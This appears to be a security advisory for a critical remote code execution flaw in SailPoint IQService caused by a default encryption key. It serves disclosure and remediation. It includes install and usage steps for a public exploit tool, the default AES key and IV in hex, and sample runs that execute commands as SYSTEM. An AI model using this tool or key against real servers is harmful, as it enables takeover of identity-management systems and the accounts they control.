Remote Code Execution in SailPoint IQService via Default Encryption Key
Exploit details, discovery methods, and remediation guidance available via NetSPI's Hack Responsibly technical blog:
Set Sail: Remote Code Execution in SailPoint IQService via Default Encryption Key
Vendor: SailPoint
Product: IQService
Versions Affected: Default configuration before IQService-May-2025
Researcher: Jason Juntunen @missing0x00
CWE: CWE-1394: Use of Default Cryptographic Key
| CVSS | Score | Severity | Vector |
|---|---|---|---|
| CVSS 3.1 | 10.0 | Critical | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CVSS 4.0 | 10.0 | Critical | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
Note
CVSS vectors and scores were calculated for servers utilizing the default encryption key. This vulnerability can be fully mitigated by following the vendor provided Secure Communication Between VA and IQService guidance.
SailPoint IQService before IQService-May-2025 is affected by a Remote Code Execution vulnerability. This is considered to be a configuration issue which impacts servers deployed using the default settings.
When deployed using default settings, the IQService RPC Server:
- Relies on a hard-coded encryption key to encrypt communications and prevent unauthorized requests
- Does not enforce user authentication
- Does not use SSL/TLS
Warning
At the time of initial disclosure, the default encryption key (intended for demo and test environments) was contained in a publicly available DLL file. This key should be considered compromised and not trusted for production use.
An attacker who knows the default encryption key can send a crafted request to the service to execute arbitrary code. Due to the application's role in Identity and Access Management, additional requests can be used to compromise managed accounts beyond the application itself.
git clone https://github.com/NetSPI/set_sail
cd set_sail
python3 -m venv set_sail
source set_sail/bin/activate
python3 -m pip install -r requirements.txt
python3 -m pip install pycryptodome
python3 set_sail.py -h
usage: set_sail.py [-h] [-p PORT] [-c [COMMAND]] [-k [KEY]] [-i [IV]] [--ssl] [--check] [-x XML] [-v] target
positional arguments:
target Target server address
options:
-h, --help show this help message and exit
-p PORT Target IQService RPC port (default: 5050)
-c [COMMAND] Command to run (default: whoami)
-k [KEY] AES key as hex string (default: 445a343241355532424f503057543256)
-i [IV] AES IV as hex string (default: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
--ssl Use SSL/TLS for TCP connection
--check Send test payload to verify default key
-x XML XML file for custom RPC payload
-v Increase output verbosity, use -vv or -vvv for more (requires coloredlogs)
--check argument can be used to test for successful encryption and decryption without executing further commands.
python3 set_sail.py 10.1.1.10 --check
VULNERABLE 10.1.1.10:5050
This sends an RPC request with service="ADConnector" method="DoNothing" and looks for RpcResponse in the decrypted response.
Default command is "whoami". Arbitrary commands can be executed using -c.
python3 set_sail.py 10.1.1.10
>>> whoami
nt authority\system
Running .\IQService.exe -v will return the service configuration information.
python3 set_sail.py 10.1.1.10 -c '.\IQService.exe -v'
>>> .\IQService.exe -v
ServiceName : IQService-Instance1
Display Name : SailPoint IQService-Instance1
Configured Port : 5050
Connection Read Timeout : 15
Update Interval : 30
Build version : IQService-Feb-2025
Build timestamp : 02/06/2025 03:31 AM -0600
Build location : master
Build builder : jenkins
Build Number : 778
Executable : C:\IQService_Feb2025\IQService.exe
File Size : 78520
File Date : 2/6/2025 3:32:22 AM
Trace Level : 3 [ debug ]
Connection to port 5050 uses default encryption keys.
Note: SailPoint recommends to configure Client Authentication and TLS Communication between IdentityNow and IQService to appropriately secure the communication with the IQService!
- Update IQService to the most recent version to ensure the availability and enforcement of security enhancements.
- Configure TLS communication and Client Authentication between the VA and IQService.
- Restrict authorized accounts to only those necessary to run the service.
- Restrict network access to the IQService server using firewall rules.
- Ensure that IQService is not accessible from the public internet.
- Understand that many tools are insecure by default. Apply the necessary settings to remove test and debug features.
- Technical Analysis https://www.netspi.com/blog/technical-blog/network-pentesting/remote-code-execution-sailpoint-IQService/
- Introduction to IQService https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/intro.html
- Secure Communication Between VA and IQService https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/secure_communication.html
- Configuring TLS and Client Authentication for IQService https://documentation.sailpoint.com/connectors/iqservice/help/common/topics/configuring_tls_and_client_authentication_for_iqservice.html
- Installing and Registering IQService https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/install_register.html
- IQService-May-2025 Release Notes https://developer.sailpoint.com/discuss/t/new-capability-integration-service-iqservice-may-2025-is-now-live/103924